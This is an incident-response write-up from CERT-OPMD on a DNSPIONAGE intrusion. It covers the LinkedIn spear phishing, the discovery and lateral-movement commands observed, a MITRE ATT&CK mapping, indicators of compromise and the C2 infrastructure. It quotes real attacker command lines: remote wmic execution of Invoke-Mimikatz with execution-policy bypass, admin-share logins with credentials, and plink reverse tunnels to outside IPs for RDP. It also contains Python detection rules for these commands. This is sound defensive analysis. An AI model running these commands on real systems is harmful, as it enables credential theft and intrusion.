Recently, we had an incident response involving the malware DNSPIONAGE.
At CERT-OPMD, we thought it would be interesting to share our observations.
Mainly, we observed quite common actions and tools, as described in the infographic below.
HOW DNSPIONAGE INFECTS TARGETS
In this blog post, we will not describe and analyse the dropper again, because Talos did a great job here: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
Instead, we will focus on what they could not have seen with their telemetry, and on what we were able to see during our investigation.
The screenshot above is what we are talking about here.
Talos observed two domains during the analysis:
And they obtained the “Suncor” dropper.
During our investigation, we were targeted by a Wipro document (cf. screenshot below):
A Google reverse image search shows us where the attackers got the image below (spoiler: on the legitimate wipro.com website, see screenshot below).
Ok, so now we are aware that they wanted to do some really advanced spear phishing.
During our investigation, we had the chance to speak with very understanding users, who remembered weird things that had happened to them.
One of them remembered he had been speaking with an HR person from Wipro on LinkedIn for a few days before the attack.
We hid the identity of the LinkedIn account because we assume there is a real person behind it, who may have had their account stolen.
“Fortunately”, the infected users were technical IT staff, so it was easy to make ourselves understood when talking about “phishing”, “spear phishing via social media”, etc.
We hope this data will help you understand how DNSPIONAGE infects people.
TOOLS USED BY DNSPIONAGE TO PERFORM INTERNAL ACTIONS
INTERNAL ACTIONS OBSERVED
Now, we will describe the lateral movement we observed during the Incident Response.
We observed some very “usual” phases in this case: a preparation phase for the whole attack (domain registration, and so on), a delivery phase (with social engineering through professional social media), an installation phase and a C&C phase (where the malware is dropped, and the macro used for dropping creates a scheduled task).
Then we observed the adversaries performing directory listing through batch files:
- dir /s /a C:\ 2>&1 (from C: to Z:)
These results were exfiltrated over HTTP to the C&C for analysis. Because the actions we observed next were file copying and exfiltration of specific files, such as a file containing the backup’s configuration, we assumed the listings were then used to map the network “passively”.
Once they had the hostname information, the adversaries performed some discovery using Microsoft tools, including network discovery, software discovery, share discovery, etc.:
- wmic logicaldisk get name
- net group \"domain admins\" /domain
- ping -n 1 -a IP
- net use \\\\HOSTNAME\\c$ /user:\"DOMAIN\\USERNAME\" \"PASSWORD\" 2>&1
- WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
- wmic /node:\"HOSTNAME\" process call create \"cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz
With all the information gathered, the adversaries could perform precise lateral movement onto critical servers, by installing a PuTTY tool to create an SSH tunnel in order to perform RDP remotely.
- echo y | .\\downloads\\plink32.exe 184.108.40.206 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>
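The command lines listed above can be turned into hunting rules for process-creation logs. The following is an added example, not code from the original post or from CERT-OPMD: the rule names, hostnames and sample events are constructed, and 192.0.2.10 is a documentation address standing in for the tunnel endpoint.

```python
import re

# Hypothetical rule names; patterns are derived from the commands listed above.
# "\\+" accepts both raw and JSON-escaped (doubled) backslashes, as seen in the logs.
RULES = {
    "wmic_remote_exec": re.compile(
        r"\bwmic\b.*?/node:(?![\\\"']*(?:localhost|127\.0\.0\.1)\b)\S+"
        r".*?\bprocess\s+call\s+create\b", re.I),
    "ps_exec_bypass": re.compile(
        r"\bpowershell(?:\.exe)?\b.*?\s-(?:ex\w*|ep)\s+bypass\b", re.I),
    "mimikatz_keyword": re.compile(r"invoke-mimikatz|sekurlsa::logonpasswords", re.I),
    "admin_share_with_creds": re.compile(
        r"\bnet\s+use\s+\\+[^\\\s]+\\+(?:[a-z]|admin|ipc)\$.*?/user:", re.I),
    "av_enumeration": re.compile(r"SecurityCenter2?\b.*?\bAntiVirusProduct\b", re.I),
    # plink -R [bind:]port:host:3389 = remote port forward exposing an internal RDP service
    "reverse_tunnel_to_rdp": re.compile(
        r"\bplink\w*(?:\.exe)?\b.*?\s-R\s+(?:[\w.\-]+:)?\d+:[\w.\-]+:3389\b", re.I),
}

def classify(cmdline):
    """Return the sorted names of every rule matching one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events):
    """events: iterable of (host, cmdline). Returns {host: set(rule names)} for hosts with hits."""
    hits = {}
    for host, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits.setdefault(host, set()).update(matched)
    return hits

# Constructed sample events (placeholder hosts, accounts and addresses).
SAMPLE_EVENTS = [
    ("WKS-01", r'net use \\SRV-DB01\c$ /user:"CORP\svc_backup" "<password>" 2>&1'),
    ("WKS-01", r'wmic /node:"SRV-DB01" process call create "cmd /c powershell '
               r'-exec bypass import-module c:\users\public\new.ps1;invoke-mimikatz"'),
    ("SRV-DB01", r'echo y | .\downloads\plink32.exe 192.0.2.10 -P 443 -C '
                 r'-R 0.0.0.0:12456:SRV-DB01:3389 -l <login> -pw <password>'),
    ("WKS-01", r'WMIC /Node:localhost /Namespace:\\root\SecurityCenter '
               r'Path AntiVirusProduct Get /Format:List'),
    ("WKS-02", r'powershell -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1'),
    ("WKS-02", r'wmic /node:localhost process call create "notepad.exe"'),
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, sorted(rules))
```

The two WKS-02 events are benign look-alikes and produce no hit; a host that accumulates several distinct rules in a short window deserves the closest look.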
The diagram below helps to understand DNSPIONAGE’s process in the network.
- Mimikatz : Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
- Off-the-shelf administration software
- Bitvise WinSSHD : Bitvise WinSSH is an easy-to-use SSH server which includes Secure remote access via console (vt100, xterm and bvterm supported), Secure remote access via GUI (Remote Desktop or WinVNC required).
- Open source Hacking tools : (https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1)
- Custom malware : DNSPIONAGE
- Putty : to open SSH tunnel in order to gain RDP access on internal assets
ATT&CK MATRIX MAPPING
In order to understand the entire behavior of the attackers, from initial access to data exfiltration, we created a matrix to reconstruct the attackers’ entire set of TTPs.
We based our matrix on MITRE’s work: MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. We broke down all the phases of the actions taken by the attackers, so that any analyst or researcher can understand and remediate this situation if they encounter it.
|MITRE ATT&CK phases||Techniques||IOC||Comments||Observations|
|Spearphishing via Service||https://fr[.]linkedin[.]com/in/XXXXXXXXXX||HR consultant spoke with targets for weeks through LinkedIn before delivering spearphishing link|
|Windows Management Instrumentation||wmic /node:\"USER\" /user:\"DOMAIN\\USERNAME\" /password:PASSWORD process call create \"cmd /c echoy y | .\\Downloads\\plink32.exe 220.127.116.11 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login>-pw <password>\"||Command Failed but was used three times|
|Downloads\\bat_file_46583.bat||Using custom batch files to script actions (script directory listing, script copy of ps1 tools to many other assets). Example in next cell||C:\\Users\\USERNAME\\.oracleServices>CHCP 65001 \r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s) copied.\r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s)|
|wmic /node:\"HOSTNAME\" process call create \"cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz||Using cmd to call powershell with "-exec bypass" args|
|wmic /node:\"HOSTNAME\" process call create \"cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz||Using powershell with "-exec bypass" args to launch mimikatz|
|Set service = CreateObject (schedule.service)
regInfo.Description = "chromium updater v 37.5.0"
regInfo.Author = "Google Inc."||Observed in dropper’s macro|
|Defense Evasion||File Deletion||del .\\Downloads\\bat_file_46583.bat||After using a custom .bat downloaded from C2, attackers deleted it immediately|
|Credential Access||Credential Dumping||sekurlsa::logonpasswords||Includes Script from https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1||Mimikatz Version : mimikatz 2.0 alpha (x64) release \"Kiwi en C\" (Feb 16 2015 22:15:28)|
|System Information Discovery (T1082)||echo %username%, i : -4000, t : -1, k : 0 | hostname i : -5000, t : -1, k : 0 | systeminfo | findstr /B /C:\"Domain\" i : -6000, t : -1, k : 0||Get detailed information about the operating system|
|Permission Groups Discovery||net group \"domain admins\" /domain|
|reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\||Get Remote Connection details from user|
|File and Directory Discovery||dir /s /a C:\ 2>&1
dir \\\\HOSTNAME\\c$ 2>&1||Use batch scripts to perform directory discovery locally or remotely|
|Windows Admin Shares||net use \\\\HOSTNAME\\c$ /user:\"DOMAIN\\USERNAME\" \"PASSWORD\" 2>&1||Try to remotely access a networked system|
|Remote System Discovery||ping -n 1 -a IP||Try to know if IP is up|
|Security Software Discovery||WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1||Adversaries attempt to get a listing of security software|
|System Network Configuration Discovery||ipconfig /all||Get details of the network configuration from the host|
|System Information Discovery||wmic logicaldisk get name||List all logical and physical drives|
|Remote Desktop Protocol||echo y | .\\downloads\\plink32.exe 18.104.22.168 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>||Using plink32 to open an SSH tunnel to perform remote RDP|
|Remote File Copy||copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1||Using remote copy to push files used for lateral movement, like new.ps1 (mimikatz)|
|Collection||Data from Local System||"ull": "/Client/Upload",
"dl": ,
"ul": ["d:\\mRemoteNG-IMFO\\confCons.xml"]|
|Exfiltration||Exfiltration Over Command and Control Channel||"ull": "/Client/Upload",
[Message] uploading files form||In log.txt we can observe the JSON orders, including the "Upload" orders and the upload URL|
|Command and control||Commonly Used Port||Port 80 HTTP for C2
Port 443 for SSH Tunnel|
|Standard Application Layer Protocol||[Message] send command result dns length:63||Base32 to encode DNS messages|
|[Message] config file found!
[Message] current directory set to C:\Users\USERNAME\.oracleServices\
[Message] entering normal mode
[Message] get command with dns||Malware can change mode into HTTP mode or DNS mode to exfiltrate data|
|Remote File Copy||"dl": ["/Client/Download/LXqaYRoxoPYNOwjfDadLJAExtjgZYBunvJFwoEohVXJvK"],||Malware downloaded batch scripts or ps1 scripts to perform actions.|
INFRASTRUCTURE IN USE DURING INVESTIGATION
GLOBAL OVERVIEW – DNS & IP PUBLICLY OBSERVABLE
During the investigation, we were able to trace a number of IP addresses used by the attackers. We found the IP that hosted the C2, the IP that was used for the RDP connection, and so on:
|22.214.171.124||Used for RDP|
|126.96.36.199||HTTP Server for C2|
By performing some passive DNS resolution from hr-wipro[.]com (the dropper delivery domain) and hr-suncor[.]com (observed by Talos), we could observe the following domains/IPs:
INFRASTRUCTURES USED FOR LATERAL MOVEMENT
After compromising the first victim, the main goal of the attackers was to perform lateral movement in order to gain better access to more sensitive data and/or assets:
- They first tried to use mimikatz remotely on several servers (which triggered our SOC alert). “Fortunately”, it seems they only used sekurlsa::logonpasswords and did not create any golden or silver tickets.
- Mimikatz was not really effective, but they could already execute arbitrary code remotely.
- So they decided to copy plink32.exe, a PuTTY-like tool, to several assets. (sha256sum:3984ae8dd6df1196211232eb56393a4ce3a330508c5862c38ea3b8faf8048072)
- They executed plink32.exe to create a tunnel in order to perform remote RDP on assets. (echo y | .\\downloads\\plink32.exe 188.8.131.52 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>)
- By using RDP, it was easier for them to access database servers and to identify other critical assets.
We were very lucky during the investigation: the attackers made a lot of errors, which made it easier for us to investigate and gave us some very precise indicators of how they perform the requests.
So, we hope this article will help you investigate internally whether you may have been targeted by DNSPIONAGE.